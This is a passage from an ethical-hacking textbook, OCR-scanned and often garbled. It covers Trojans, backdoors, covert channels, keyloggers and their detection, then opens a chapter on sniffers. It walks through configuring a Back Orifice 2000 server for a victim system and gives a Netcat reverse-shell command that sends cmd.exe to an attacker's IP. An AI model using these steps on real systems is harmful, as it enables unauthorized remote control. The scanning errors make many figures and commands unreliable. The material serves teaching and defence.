victims’ computers. A common theme among these methods is that they play on the human
desire to get something for nothing. Here are the common methods for installing a Trojan:

CHAPTER 11 Trojans and Backdoors

Peer-to-peer networks (P2P) — This delivery mechanism has become very popular
due to the increased number of individuals using these networks to obtain software
free of charge. An attacker can easily grab a legitimate piece of software, embed
a Trojan in it, and post it on file sharing and wait for victims to download it.

Instant messaging (IM) Delivering malicious software via l! has been very
common an it is easy and IM software has never had much in the way of security
controls.

• Internet Relay Chat (IRQ — IRC is a mechanism commonly used to deliver messages
software.

E-mail attachments — With the rise of e-mail as a communication medium, the
practice of using it to distribute Trojans also rose. Trojans have been distributed
in this medium as attachments and as clickable links,

• Physical access — Decidedly low tech but no less effective is physical access to a
system. Once an attacker trains physical access, it becomes relatively easy to install
the Trojan and compromise the system.
• Browser defects — With many users forgetting to or choosing not to update their
browsers as soon as updates are released, distribution of Trojans becomes easier.
Since Web browsers are designed by their very nature to treat content that they
are sent as trusted , this allows malicious programs to run unabated,

• Freeware — You don’t get something for nothing and thinking you are getting free
or un trusted sources can mean that you may have downloaded something naslier.
such as a Trojan infested application,

• Operations that could be performed by a hacker on a target computer system include:

■ Data theft

• Installation of software

• Modification of files

• Installing key loggers

• Viewing the system user’s screen
Consuming computer storage space

• Crashing the victim’s system

• Trojans are commonly grouped into the category as viruses, but th is is not entirely
correct. Trojans are similar in certain ways to viruses in that they attach to other files
which they use as a carrier, but they are different in the fact that they are not designed to
replicate. The method of distribution that is used for Trojans is simple in that they attach
themselves to another file and the file is retrieved and executed by an unsuspecting victim,
Once this event occurs, the Trojan typically grants access to the attacker or can do some
other action on the attacker’s behalf.

258 PART 2 A Technics I Overview of Hacking

Trojans require instructions from the hacker to fully realize their purpose before or
after distribution. In fact is has been shown in the majority of cases that Trojans are not
actually distributed past the initial stages by their creators. Once attackers release their
code into the world H they switch their involvement from the distribution to the listening
phase, where Trojans will call home, indicating they have infected a system and may
be awaiting instructions.

Targets of Trojans

The more we all use the Internet to communicate, shop, and even store our stuff,
the more we generate targets for hackers and their Trojan horses. Here are some
of the targets that tempt hackers:

• Credit card data — Credit card data and personal information is a tempting and
all too common target I.’pon obtaining this information an attacker can embark
on a shopping spree purchasing any type of product or service they desire, such
as YVeh services, games or other produeis.

Passwords — Passwords are always an attractive target for attackers. If they
obtain this sort of information, it can prove devastating to the victim. Since most
individuals will reuse passwords over and over again, getting one password from
an individual can easily open many doors. And usme, a Trojan Lo oh lain passwords
can mean that a hacker can read passwords from a system that includes everything
from e-mail and Internet accounts to banking passwords,

Insider Information Coniidential or insider information is another target for
an attacker. An attacker may very well use a Trojan to gain information from
an organization that may not otherwise be public.

• Data storage — In some cases a system that becomes the unlucky recipient of a
Trojan may lind itself a point for storing data without their knowledge. I’ploading
data to an infected system can turn that system into a server that can host any
type of content Infected hosts have been known to include illegal music or movies,
pirated software, pornography, linancial data, or even child pornography.

• Random acts of mischief — In some cases the intention may
just want to irritate or annoy the system ow r ner. The hacker
may have simply want to have some fun at the victim’s expense.

^ NOTE

Trojans rely on the fact that
they look tike something the
user wants, such as a game
or prece of free software.
When users install or run this
software they run the main
program, but unbeknown to
them, the Trojan is running
in the background.

The first widespread Trojans to appear debuted between 1994 and
1998 as distribution methods became more robust (think Internet).
Prior to this point the software was distributed via bulletin board
systems iRISSsl floppies, and similar of methods, Since the early days
of Trojans the sophistication of the software has increased, as has
the number of reported incidents associated with this type of code.
Of course as Trojans increased in sophistication, so did the methods
used to thwart them, such as antivirus software and other lools.

CHAPTER 11 Trojans and Backdoors

Known Symptoms of an infection

So what are the symptoms or effects of an infection of a Trojan? In the event that your
ei nti virus does not detect and eliminate this type of software, it helps to be able to identify
some of the signs of ei Trojan infection:

• The CD drawer of a computer opens and closes.

• The computer screen changes, as by Nipping or inverting.

• Screen settings change by themselves.

• Documents print with no explanation^

• The browser is redirected to ei strange or unknown Web page.

• Windows color settings change.

• Screens ave r se t tin gs ch a n ge.

• Right and left mouse buttons reverse their functions.

• The mouse pointer disappears.

» The mouse pointer moves in unexplained ways.

• The start button disappears.

• Chat boxes appear on the infected system.

• The Internet Service Provider (ISPS reports that the victim’s computer
is running port scans.

• People chatting appear to know detailed personal information.

• The system shuts down by itself.

• The task bard isa ppe ar s .

■ The account passwords are changed.

• Legitimate accounts are accessed without authorization.

• Unknown purchase statements appear in credit card bills.

• Modems dial and connect to the Internet by themselves.

• Ctrl+Alt+Del stops working.

• While the computer is rebooted, a message stales that there are other users
still connected.

Detection of Trojans and Viruses

There are several methods of detecting if a Trojan is present on a system , but few prove
more useful to the security professional than looking at ports h so let’s go back to a topic
that was discussed in a previous chapter.

If Trojans are going to give an attacker the ability to attach to a system remotely, they
are going to need to attach to the system through the use of a port. Some Trojans use well
known ports that can be easily detected; others may use nonstandard or obscure ports
that will need a tittle extra investigation to determine what is listening (whether it is
a legitimate service or something else). Table 11-1 lists some of the common ports that
are used for some classic Trojans.

260 PA RT 2 A Tech n i ea I Overview of H ack i n g

table 11-1 S ome classic Troja ns and the ports and pn

)tocols they use.

TROJAN

ill v#jn.i n

PROTOCOL

PORTS

Back Orifice

UOP

31337 or 31338

Back Orifice 2000

TCP/UDP

54320/54321

Beast

TCP

6666

Citrix ICA

TCP/UDP

1494

Deep Throat

UDP

2140 and 3150

Desktop Control

UDP

MA

Donald Dick TCP

TCP

23476/23477

Loki

ICMP (Internet Control
IVIessaqe Protocol)

NA

NetBus

TCP

12345 and 12346

Netcat

TCP/UDP

Anv

Met meeting Remote

TCP

4960B/49609

pcAnywhere

TCP

5631/5632/65301

Reachout

TCP

43188

Remotelv Anvwhere

TCP

2000/2001

Remote

TCP/UDP

135-1139

Whack-a-mole

TCP

12361 and 12362

NetBus 2 Pro

TCP

20034

Girl Friend

TCP

21^44

TCP

3129, 40421 r 40422, 40423
and 40426

Timbuktu

TCP/UDP

407

VNC

TCP/UDP

5800/5801

CHAPTER 11 Trojans and Backdoors

Results of the netstat command.

Of the tools for detecting Trojans* one of the easiest to access would be the command
line tool known as netstat. Using netstat it is possible to list the ports that are listening
on a system and browse each to see what is supposed to be running on each.

In Windows at the command line you can type the following command:

netstat -an

This command will display the results shown in Figure 11-1.

Another tool that could help you locate the ports that a Trojan is listening for instruc-
tions on is nniap, With nmap you can scan ei system tind get a report back on the ports
that are listening and investigate further to see if any unusual activity is afoot.

Vulnerability Scanners

Providing an additional tool is the use of a category of software known as the vulnerability
scanner. Software of this type can be used to scan a system, locate, and report back on
services such as Trojans listening on the ports of a system. One of the h est known scanners
of this type is the tool known as Nessus.

One of the best and most reliable methods of detecting Trojans, viruses, and worms is
the use of the ubiquitous antivirus software. Software of this type is used to scan for the
behaviors and signatures of these types of code and in turn remove and/ or quarantine
them on the system.

Antivirus

262 PART 2 A Technics I Overview of Hacking

Trojan Tools

There exist a wide range of tools used to take control of a victim’s system and leave
behind a -l present” for I hem in the farm of a backdoor. We will not tit tempt to cover all
these tools, but for reference the following list includes some of the more common ones
that have been found in the wild. Note that this is not an exhtiustive list and there Eire

Let me rule — A remote access Trojan authored entirely in Delphi; uses TCP
port 26(19 7 by default

• RECUS — Remoted Encrypted Callback UNIX Backdoor (RECIIB) borrows its name
from the UNIX world. This product features RC4 encryption, code injection, and
encrypted ICMP communication request. Demonstrates a key trait of Trojan
software, small size, as it tips the scale at less than 6 KB.
• Phatbot — Capable of stealing personal information including e-mail addresses,
credit card numbers, and software licensing codes. Returns this information

• to the attacker or requestor using a peer-to-peer (P2P) network. Phatbot also
has the ability to terminate many antivirus and software- based firewall products
leaving the victim open to secondary attacks.

Am it is — Opens up TCP port 275 51 to give the hacker complete control of the
victim’s computer.

Zombam.B Allows the attacker to use a Web browser to infect a computer.
Uses port 8(1 by default, created with a Trojan generation tool known as HTTPRat.
Much like Phatbot, it also attempts to terminate various antivirus and firewall
processes,

■ Beast — Uses a technique known as DDL (Data Definition Language) injection.
Using this technique the Trojan injects itself into an existing process, effectively
hiding itself from process viewers. It is harder to detect and harder to eradicate,

• Hard disk killer — A Trojan written to destroy a system’s hard drive. When executed
it will Eittack a system’s hard drive and wipe the hEird drive in just a few seconds.

Going back to something that was discussed in a previous chapter
known as the NULL session, this is something we can use to place
a Trojan, As you read, the NULL session is a feature of Windows that
allows connections under the guise of the anonymous user. With
this NULL session a connection can be made to enumerate shares
and services on the system for whatever goat the attacker may have,
which can be, in this chapter, to install a Trojan.

Using a NULL session we will install one of the oldest and most
[ulmin titration, Back Orifice (E02K) can be placed on a victim’s system to give the
attacker the ability to perform a diverse range of attacks,

NOTE

Back Orifice is an older
Trojan tool that is stopped
by any of the major
antivirus applications that
are in circulation today.

CHAPTER 11 Trojans and Backdoors

263

The manufacturer of Buck Oriiice says this about B02K:

NOTE

“Built upon the phenomenal success of Back Orifice released
in August 98, B02K puts network Eidminislrators solidly

Back Orifice is billed by the
manufacturer as a remote
will call it a Trojan instead.
We will not address or attempt
to settle this argument here,
but we will treat the tool
as a Trojan as it exhibits the
behaviors associated with this
class of software.

back in control. In control of the system, network, registry.

passwords, file system, and processes. B02K is a lot like other
major file-synchronization and remote control packages that
are on the market as commercial products. Except that B02K
is smaller, faster, free, and very, very extensible. With the help
of the open -source development community, B02K will grow
even more powerful. With new plug-ins and features being

added all the lime, B02K is an obvious choice for the productive
ne t wo r k ad m in is tr a 1 < > r, ”

An In-Depth Look at 802K

Whether you consider it a Trojan or a “remote administrator tool.” the capabilities
of BOK2 are fairly extensive for something of this type. This list of features is adapted
from the manufacturer’s Web site:

Client Features

• Address book style server list
• Functionality can be extended via the use of plug-ins.

• Multiple simul taneo u s s erver connections

• Session logging capability

• Native Server Support

■ Key loggingcap ability

• Hypertext Transfer Protocol (HTTP) file system browsing and transfer
• Microsoft Networking file sharing

• Remote registry editing

• F ile b row si n g, t ra n sfe r. a n d m a n a gem en t

• Plug-in extensibility

• Remote upgrading H installation, and un installation

• Network redirection of Transfer Control Protocol /Inter net Protocol (TCP /IP)
connections

• ■ Access console programs such as command shells through Telnet

• Multimedia support for audio/video capture, and audio playback

• Process control, start, stop, list

• ■ Multiple client connections over any medium

• GUI m es sa ge pro m pts

264

PART 2 A Technical Overview of Hacking

» Proprietary rile compression

• Remote reboot

» Domain Name Service (DNS) n ei in e resolution

• Cryptographically Strong Triple-DES encryption
• Re m ote d eskto p wi t h op tion ei 1 m o use and key tao a rd c o n tro I

• Drag and drop encrypted file transfers and Explorer-like lilesyslem browsing

• Graphical rem ote r eg is try ed i ling

• Reliable User datagram protocol (UDP) Eind Internet Control Message Protocol
(ICMP) communications protocols

• Back Orifice 20(H) (1302K) is a next generation tool that was designed to accept customized,
specially designed plug-ins. B02K represents a dangerous tool in the wrong hands. With
the software’s ability to be configured to carry out a diverse set of tasks at the attacker’s
behest, it can be a devastating tool. B02K consists of two software components in the
form of a client and a server.

To use the R02.K server, the configuration is as follows:

1. Start the B02K, Wizard and click Next when the Wizard’s splash screen appears.
• When prompted by the Wizard, enter the server executable to be edited,

• Choose the protocol to run the server communication over.

• The typical choice is to use TCP as the protocol due toils inherent robustness.

UDP is typically used if a firewall or other security architecture needs to
be traversed.

1. After choosing to use TCP to control the B02K server the next screen queries
the port number that will be used,

Port 80 is generally open, and so it’s the one most often used H but any open
port can be used.

1. In the next screen, enter a password that will be used to access the server.

Note that passwords can be used but the attacker could choose open
authentication that w T ould mean that anyone could access without having
to supply credentials of any kind.

1. The server configuration tool is provided with the information the attacker
has entered when the W’izard finishes.
• The server can then be configured to start when the system starts up.

• This will allow the program to restart every lime the system is rebooted,
preventing the program from becoming unavailable.

1. Click Save Server to save the changes and commit them to the server.

CHAPTER 11 Trojans and Backdoors

265

Once the server is configured it Is now ready to be installed on the victim’s system.
No matter how the installation is to tEike place, the only applicEilion that needs to be run
on the target system is the B02K executable, Once this application is run, the victim’s
system will have the port that was configured previously opened on their system and
he ready to accepi input from I b e all ticker

In addition the application runs an executable file called I’mgr }2,exe and places
it in the Windows system 3 2 folder. Additionally, if you configured the BQ2K executable
to run in stealth mode, it wit I not show up in Task Manager as it modifies an existing
running process to act as its cover, If stealth was not configured, the application will
show up as a Remote Administration Service. Stealth or no stealth, the result is the same:
The attacker now has a foothold on the victim’s system.

Distribution Methods

Configuring and creating Trojans has become very simple; the process of getting them
onto the victim’s system is the hard part. In today’s environment users have become
much more cautious than previously and generally are less likely to click on attachments
and files they are suspicious of. Additionally, most systems include antivirus software that
is designed to detect behavior that is the signature of Trojans. Tactics that used to work
will not be as successful today.

To counter this change, tools are available that can be used to slip a dangerous pay load
pas I li victim s defenses. With i he tools discussed briefly in I his seel ion together wit Ji
knowledge of how a Trojan works, it is possible for even a novice to create an effective
mechanism to deliver a pay load on target.

Using Wrappers to Install Trojans

One such application to deliver this type of pay load is known
as wrappers. Using wrappers, attackers can lake l heir intended
pay load and merge it with a harmless executable to create
a single executable from the two. At this point, the new
executable can be posted in some Location where it is likely
Web site and uses wrappers to merge a Trojan (that is, BG2K)
into the application before posting it on a newsgroup or other
location, Some more advanced wrapper-style programs can
even bind together several applications instead of the tw T o
actually a “bomb” waiting to go off on the system. When the
victim runs the infected software, the in fee tor installs and
takes over the system.

NOTE

This scenario is similar to what
can and does happen with
so-called J ‘warez’ r sites. In this
a legitimate program, embeds
a pay load into it, and posts it
on file-sharing networks such as
SitTorrent. Someone looking to
get the new software free instead
of paying for a legitimate copy
actually gets a nasty surprise.

266

PART 2 A Technical Overview of Hacking

Wrappers tend to be one of the tools of choice for script kiddies due to their reltitive
ease of use and their overall accessibility. 1 1 tickers in this category find them effective for
their purposes.

Some of the better-known wrapper programs are the following:

• EliteWrap — Elite Wrap isoneofthe most popular wrapping tools available due to

its rich feature set that includes the ability to perform redundancy checks on merged
files to make sure the process went properly and the ability to check if the software
will install as expected. Furthermore the software can even be configured to the
point of letting the attacker choose an installation directory for the pay load. Finally*
software wrapped with EliteWrap can be configured to install silently without any
user interaction,

Saran Wrap — A wrapper program specifically designed to work wUh and hide
Back Orifice, it can bundle Back Orifice with an existing program into what
appears to be a standard “Install Shield” installed program.

• Trojan Man — This wrapper merges programs and can encrypt the new package
in order to bypass antivirus programs.
• Teflon Oil Patch — Another program designed to bind Trojans to a specified file
in order to defeat Trojan detection applications

• Restorator — An example of an application designed originally with the best of
intentions but now used for less than honorable purposes. Has the ability to add

• a payload to a package, such as a screen saver, before it is forwarded to the victim.

Firekiller 2000 — A tool designed to he used with other applications when wrapped.
This application is designed to disable firewall and antivirus software. Programs
such as Norton Antivirus and McAfee VirusScan were vulnerable targets prior
to being patched,

Trojan Construction Kits

One of the other tools that have emerged over the past few years is the Trojan construction
kit. The purpose of these kits is to assist in the development of new Trojans. The emergence
of these kits has made the process of creating Trojans so easy that even those with
knowledge equivalent to the average script kiddie can cretite new and dangerous entities
without much effort at all.

Several of these tools are shown in the following:

The Trojan construction kit — One of the best examples of a relatively easy
to use, but potentially destructive, tool. This kit is command line based, which
may make it a little less accessible to the average per son k but it is nonetheless very
capable in the right hands. With a little bit of effort it is possible to build a Trojan
that can engage In such destructive behavior as destroying partition tables.
Master boot records (MBR)> and hard drives.

CHAPTER 11 Trojans and Backdoors

Senna Spy — Another Trojan creation kit that is capable of custom options, such as file
transfer, executing DOS coin mauds, keyboard control, and list and control processes.

Stealth tool — A program used not to create Trojans, but to assist them in hiding.
In practice, this tool is used to alter the target file by moving bytes, changing headers
splitting files, and combining files.

Backdoors

Many attackers gain access to their target system through something known as

a backdoor. The owner of a system compromised in this way may have no indication

that someone else is even using the system.

Typically a backdoor when implemented will achieve one or more of three key goals:

• Provide the ability to access a system regardless of security measures that
an administrator may take to prevent such access

• Provide the ability to gain access to a system while keeping a low profile.
This would allow an attacker to access a system and circumvent logging
and other detective methods.

• Provide the ability to access a system with minimal effort in the minimum
amount of time. Under the right conditions a backdoor will allow the attacker

Some common backdoors that are placed on a system are of the following types and
purposes:

• Password -cracking backdoor — Backdoors of this type rely on an attacker uncov-
ering and exploiting weak passwords that have been configured by the system owner.
System owners who fail to follow accepted guidelines for making strong passwords
become vulnerable to attacks of this type. A password-cracking backdoor in fact may
be the first attack an aggressor will attempt as it provides access to a known account.
In the event another account was used to crack the password, the system owner may
find this account and shut it down: however, ‘.villi tin other account compromised
the attacker will still have access.

• Root kits — Another type of backdoor thai can be created on a system is caused by
attackers replacing existing files on the system with their own versions. Using this
technique, an attacker can replace key system files on a computer and therefore alter
the behavior of a system at a fundamental level. This type of attack uses a specially
designed piece of software known as a rootkit that replaces these files with different
versions. Once this process has been carried out. the system will now do something
or behave differently than designed and once this is the case getting trustworthy
information from a system may be questionable,

268 PART 2 A Technical Overview of Hacking

Services Backdoor -Network services art another target for attack tint! modiiication
with a backdoor, Understanding how a service runs is important to understanding
this attack. When a service runs, as explained previously, the process runs on a port
such as 80 or 66 h. Once a service is answering on a port, an attacker can attach
to the port and issue commands to the service that has been compromised. There
are different ways lor an attacker to get the compromised service on the system,
but in all such cases the service installed is one that the attacker has modified
and configured for his or her purpose.

Process hiding backdoors — An attacker wanting to stay undetected for as long as
possible will typically choose to go the extra step of hiding the software he or she is
running. Programs such as a compromised service, password cracker sniffers, and
rootkils Lire items that an titt acker will want to configure so as to avoid detection and
removal. Techniques include renaming a package to the name of a legitimate program
or altering other files on a system to prevent them from being detected and running.

Once a backdoor is in place, an attacker can access and manipulate the system at will.

Covert Communication

An item of concern for a security professional is the covert
channel and the danger it poses. Covert channels are capable
of transferring information using a mechanism that was not
designed for the purpose. When a covert channel is in use,
information is typically being transferred in the open, but hut (Jen
within that information is the information that the sender and
receiver wish to keep confidential. The beauty of this process is
that unless you are looking for the information that is hidden,
you will not be able to find it.

Additionally the Trusted Computer System Evaluation Criteria
(TCSEC) defines two specific types of covert channels known as
timing and storage channels:

• Covert storage channels — include all mechanisms or processes that facilitate
the direct or Indirect writing of data to a location by one service and the direct
or indirect reading of it by another. These types of channels can involve either the
direct or Indirect writing to a location (such as a hard disk or flash drive) by one
process and the subsequent direct or indirect accessing and reading of the storage
location by different process or service.

Covert timing channels — Send their information by manipulating resource usage on
the system (i.e. memory usage I to send a signal to a listening process. This attack is
carried out by passing unauthorized information through the manipulation of the
use of system resources (for example, changing the amount of CPU time or memory
usage). One process will manipulate system resources in a specific, predefined way
and these responses will be interpreted by a second process or service.

The term covert channel was
coined in 1972 and is defined
as “mechanisms not intended
for Information transfer of
any sort, such as the service
program’s effect on system
differentiates covert channels
from the normal mechanisms
used to transfer information.

CHAPTER 11 Trojans and Backdoors

Tools to exploit covert channels include:

■ Loki — Was originally designed to be a proof of concept on how ICMP tra flic can
be used as a covert channel. This tool is used to pass information inside of ICMP
echo packets, which can carry a data pay load but typically do not. Since the ability
to carry data is there already, bu t not used, this can make an ideal covert channel.

• ICMP backdoor — Similar to Loki, but instead of using Ping echo packets it uses
Ping replies.

0075hell — Uses ICMP packets to send information, but goes the extra step
of formatting the packets so they are normal in size

• BOCK — Similar to Loki. but uses ICMP instead

• Reverse World Wide Web [WWW} Tunneling Shell — Creates covert channels
ih rough lirewalh mul pn.>:kN ny inaseuerLidinj! as normal Wen traf’lie

• AckCmd — This program provides a command shell on Windows systems.
Covert communication occurs via TCP ACK replies.

The Role of Keyloggers

Another powerful way of extracting information from a victim’s system is to use a piece
of technology known as a key logger. Software in this category is designed to capture and
report activity on the system in the form of keyboard usage on a target system. When
placed on a system it gives the attacker the ability to monitor all activity on a system and
have it reported back to the attacker. Under the right conditions this software can capture
passwords* confidential information, and other data.

Typically keyloggers are implemented one of two ways: hardware or software. In
software- based versions, the device is implemented as a small piece of code that resides
in the interface between the operating system and keyboard. The software is typically
installed the same way any other Trojan would be bundled with something else find made
available to the victim who then installs it and becomes infected, Once the software is
installed, the attacker now receives all the information he or she is looking for.

■ZEiB

Keyloggers are a sticky situation for companies and other organizations wishing to use them
to monitor employee activities. In most, but not all, cases notifications must be made to the
user base letting them know that they may be monitored and seeking consent to such. If the
company wants to capture illegal or illicit activity notifying the users may make such a task
difficult to accomplish. In a few cases installing a keylogger on a system without telling the
user of that system that he or she was being monitored compromised a whole case.

270

PART 2 I A Technical Overview of Hacking

Some hardware key loggers have become even more advanced in how they are plated on
a system. Recent developments in this area have included the ability to embed the keylogger
hardware into a keyboard that looks no different from a regular keyboard. A user looking
for a device sticking out of the back o1 the system would never find these types of keyloggers
as there isn’t anything sticking out of the back of the system.

Of course under I he right conditions software-based key loggers can be detected, so an
alternative method is available Ln the form of hardware-based methods. Hardware-based
keyloggers have the ability to be plugged into a universal serial bus (USB) or PS2 port on a
system and monitor the passing signals for keystrokes. What makes hardware key loggers
particularly nasty is the fact that they are hard to detect unless you visually scan for them.
Consider the fact that most computer users never look at the back of their system and
you have a recipe for disaster.

Software

Some of the keystroke recorders include:

• IKS Software Key I agger — A Windows based key logger that runs in the
background on a system at a very low level Due to the way this software

is designed and runs on a system* it is very hard to detect using most conventional
means. The program is designed to run at such a low level that it will not show
up in process lists or through normal detection methods.

G host Key I ogg er — A not h er W in do ws-b a sed key logger that is d esig ned to run
silently in the background on a system much like IKS. The difference between
this software and IKS is the ability to record activity to an encrypted log that
can be e-mailed to the attacker.

Sped or Pro — Designed to capture keystroke activity, e-mail passwords*
chat conversations and logs, and instant messages.

• FakeGINA — This is an advanced key logger that is very specific in its choice
of targets. This software component is designed to capture usernames and
passwords from a Windows system, specifically to intercept the communication
between the Win logon process and the logon GUI in Windows.

Port Redirection

One common way to exploit the power of covert channels is to use a process known
as port redirection. Port redirection is a process where communications are redirected
to different ports than they would normally be destined for. In practice this means traffic
that is destined for one system is forwarded to another system.

CHAPTER 11 Trojans and Backdoors

When a packet is sent to a destination, it must have two things in place, an IP address
Eind Ei port number, like so:

192,168.1 l(K):Kt)

Or:

< i p_ Eid d ress > : < por I n u mbe r >

If a packet is destined for a Web server on a system with the address 192.1 68.1.210
it would look like the following:

1. 168.1.210:8(1

This would tell the packet to go to the IP address and access port 80, which, by default, is the
port used for the Web server service. As was seen in a previous chapter every system has
65,535 ports that can be accessed by services and used for communications. Some of these
ports tend to be used more often than others. For exEimple. HTTP uses port 80 and FTP uses
port 21. In practice only those ports that will be used by applications should be available for
use. Anything not explicitly in use should be blocked and typically is. This poses a challenge
for the hacker, one that can be overcome using the technique of port redirection.

Port redirection is made possible by setting up a piece of software to listen on specified
ports and when packets are received on these ports, the traffic is sent on to another
system. Currently there are a myricid of tools available to do just this very thing, but
the one we will look at more closely is Netcat.

TABLE 11-2 Options ft

r Netcat.

SWITCH

DESCRIPTION

Nc-d

Used to detach Netcat from the console

Nc -i -p [port]

Used to create a simple listening TCP port; adding -u
will place it into UDP mode

Nc -e [program]

Used to redirect stdin/stdout from a program

Nc -w [timeout]

Used to set a timeout before Netcat automatically quits

Program | nc

Used to pipe output of program to Netcat

Nc | program

Used to pipe output of Netcat to program

Nc -h

Used to display help options

Nc -v

Used to put Netcat into verbose mode

Nc -g or nc -G

Used to specify source routing flags

Net

Used for Telnet negotiation

Nc -o [file]

Used to hex dump traffic to file

Nc -z Used for port scanning

272 PART 2 A Technical Overview of Hacking

Netcat is a simple command line utility available for
Linux, UNIX, and Windows platforms. Netcat is designed
to function by reading information from connections using
TCP or [J DP and doing simple port redirection on them as
configured. Table 11-2 shows some of the options that can
be used with Netcat.

Netcat also has a close cousin

the ability to encrypt the traffic
it sends back and forth between
systems. For the purposes of the
discussion we will have here in
this chapter, we wit I use Netcat

Let us take a look at the steps involved to use Netcat
to perform port redirection.

The first step is for the hacker to set up what is known as
a listener on his or her system. This prepares the attacker’s
system to receive the information from the victim’s system.
To set up a listener, the command would be as follows:

alone, but consider using Cryptcat

if you want the extra protect Eon
that comes with encrypting your
communication.

nc -v -1 -p SO

After this, the attacker would need to execute a command on the victim’s system to
redirect the traffic to their system. To accomplish this, the hacker executes the following
command from the intended victim’s system:

nc -n hatkers_ip 80 -e “cmd. exe ”

Once this is entered, the net effect would be that the command shell on the victim s
system would be at the attacker’s command prompt ready for input as desired.

Of course Netcat has some other capabilities, including pari scanning and placing
files on a victim s system ,

Port scanning can be accomplished using the following command :

nc -V -z -Ml IPaddress <staxt port> – <ending port>

This command would scan a range of ports as specified.

Of course Netcat isn’t the only available tool to do port redirection. Tools such as
Data pipe and Fpipe can perform I be same functions albeit in different ways.

The hesl v. tiy to blunt the impEiel of Trojans is 1o slop them helut e they become
an issue. When you become proactive instead of reactive, you can make management
easier. Using all the tools available to you for prevention can make all the difference.
Use of the following applications becomes a necessity when protecting a system:

Antivirus I laving software in place that actively looks for infections and
eradicates them is paramount. Several of the applications mentioned here
as Trojans can be thwarted by an antivirus.

• Anti-spyware — This software works in concert with other forms of protection
looking for suspicious behavior and items such as key loggers.

Software Protection

CHAPTER 11 Trojans and Backdoors

273

• F i re wa I Is — Slopping communications bet wee n so ft wa re s u ch a s c I ien 1 s an d servers
can block attacks quite easily and blunt the effect of Trojans in the event they get
on the svstem.
• Updates — Updating software and sy stems is a key defensive strategy that can address
defects in software such as browsers that can be exploited by attackers.

• Education — Knowing is half the battle and educating your users on proper proce-
dures and how to prevent infections can yield benefits that other methods cannot.

• What do you do if you suspect you are a victim already? Your toolbox already holds a
number of tools that can be used to capture the telltale signs of infection. These include
the following:

• Tas kma nag er — P rov ide d w i t h W indows and used to di splay de tai led information
• Ps — The command equivalent of taskmanager, which is used to disphiy
the currently running processes on UNIX/Linux systems

• Netstat — Netstat displays active TCP connections, ports
on which the computer is listening, Ethernet statistics,
the IP routing table. IPv4 statistics, and more.

• Tlist — A Windows -based tool used to list currently
running processes on local or remote machines

• TCPView — A GUI tool by Winternals used to display
running processes

• ■ Process viewer — A Windows Graphical User Interface
(GUI) utility that displays data about running processes

• Inzider — Lists processes on a Windows system and the
ports each one is listening on, Inzider is useful in locating
Trojans that have injected themselves into other processes.

NOTE

Remember that if you suspect
a system is infected or a piece
of media is compromised in any
way, the tools noted here should
not be run from that location.
Doing so can mean that the tool
you are running may actually be
infected or altered in some way

274

PART 2 A Technical Overview of Hacking

CHAPTER SUMMARY

This chapter looked at one of the oldest forms of ma 1 ware, known as the Tro)an.
‘J rojajis ;irc software applications that are designed to deliver control of a system
to an attacker. By design, Trojans are meant to be installed quickly and stealthily
on a victim’s system so as to avoid detection.

Once a Trojan is installed successfully on a system, the next step most of them
per lor m is to open it backdoor. Backdoors are openings put in place by an attacker
to bypass the normal security measures that exist on a system. Once these constructs
are in place the attacker has the ability to gain stealthy and unchecked access to
a system for any purpose that they intended. Typically, this access is given for the
purpose of remote access, but it could be Tor data transfer or other purposes.

Working in concert ivilli ll backdoor is something known as u cover! tnid overl
channel. A backdoor can be installed by a Trojan that will in turn provide li covert
channel that can be used to avoid detection and the stopping of an attack. Covert
channels represent mechanisms for transferring information between systems and
processes in ways that they were not intended to do. Willi data and information
being transmitted over unsupported channels, lhe problem becomes one of li lack
of security measures as unsupported channels may not he monitored the same way
as supported ones are, if al all. Overt channels are the ways the data is expected
to be transferred, but inside these channels an attacker can hide covert channels.

KEY CONCEPTS AND TERMS

Covert channels

Master boot records (MBR)

Trojan construction kit
Trusted Computer System

Overt channels
Port redirection

Evaluation Criteria (TCSEC)
Universal serial bus (USB)

PS2

CHAPTER 11 Trojans and Backdoors

275

CHAPTER 11 ASSESSMENT

1. Trojans arc a type of malware.

A. True

B. False

1. Covert channels work over

A, known channels

B, wireless

C, networks

D, security controls

1. Which of the following is one of the goals
of Trojans?

A, Send data

B, Change system settings

C, Open overt channels

D, (live remote access

1. Backdoors are an example of covert channels,

A. True

B. False

1. are methods for transferring data

in an tin monitored manner.

1. Backdoors on a system can be used to bypass
firewalls and other protective measures.

A. True

B, False

1. Trojans can be used to open backdoors
on a system,

A. True

B. False

fi. Trojans are designed to be small and stealthy
in order to:

A. Bypass covert channels

B. Bypass firewalls

C. Bypass permissions
11 Bypass detection

CHAPTER

Sniffers, Session Hijacking,
and Denial of Service Attacks

THIS CHAPTER FOCUSES ON three broad types of network attacks:
sniffers, session hijacking, and denial of service (DoS) attacks.
Each of these is a dangerous too! in the hands of a skilled attacker,
so you must have a thorough understanding of each one.

The first discussion in this chapter is on the topic of sniffing, or observing
communications on the network in either a passive or an active mode. With
sniffing you can see what is being transmitted on the network unprotected
and potentially intercept sensitive information to use against the network
or system owner. Sniffers are designed to go after and compromise the
confidentiality of data as it flows across the network, capturing this data,
and putting it in the hands of an unauthorized party.

An extension or upgrade to sniffing is the session hijack, which is a more
aggressive and powerful weapon in the hacker’s arsenal. A session hijack
involves taking over an existing authenticated session and using it to monitor
or manipulate the traffic and potentially execute commands on a system
remotely. In its most advanced stages, session hijacking directly affects and
attacks the integrity of information in an organization. Attackers using this
technique can modify information at will as they have the credentials of the

Denial of service (DoS) is the third type of attack covered in this chapter.
It generally involves one computer targeting another, seeking to shut it down
and deny legitimate use of its services. A distributed denial of service attack
(DDoS) involves hundreds or even thousands of systems seeking to shut
down a targeted system or a network. Such large-scale attacks are typically
accomplished with the aid of botnets — networks of infected systems
conscripted to do hackers’ dirty work for them.

276

Chapter 12 Topics

This chapter covers the following topics and concepts:

• What sniffers are

■ What session hijacking is

• What denial of service (DoS) is
• What distributed denial of service (DoS) attacks are

• What botnets are

• Chapter 12 Goals

When you complete this chapter, you will be able to:

• Describe the value of sniffers

• Describe the purpose of session hijacking

• Describe the process of DoS attacks

• Describe botnets

• List the capabilities of sniffers

• Describe the process of session hijacking

• Describe the features of a DoS attack

Sniffers

A sniffer is a vakmble piece of software or a dangerous piece
of software, depending on who is using the application. Before
getting into a discussion of sniffers , it is necessary to understand
what the program actually does. The simple definition of sniffers
is that they are an a pp Lie at ion or device that is designed to
capture h or “sniff/ 1 network traffic as it moves across the network
itself. In the context of this hook, sniffers are a technology used
to steal or observe information that you may not otherwise have
File Transfer Protocol (FTP) credentials, e-mail contents, and
transferred files,

NOTE

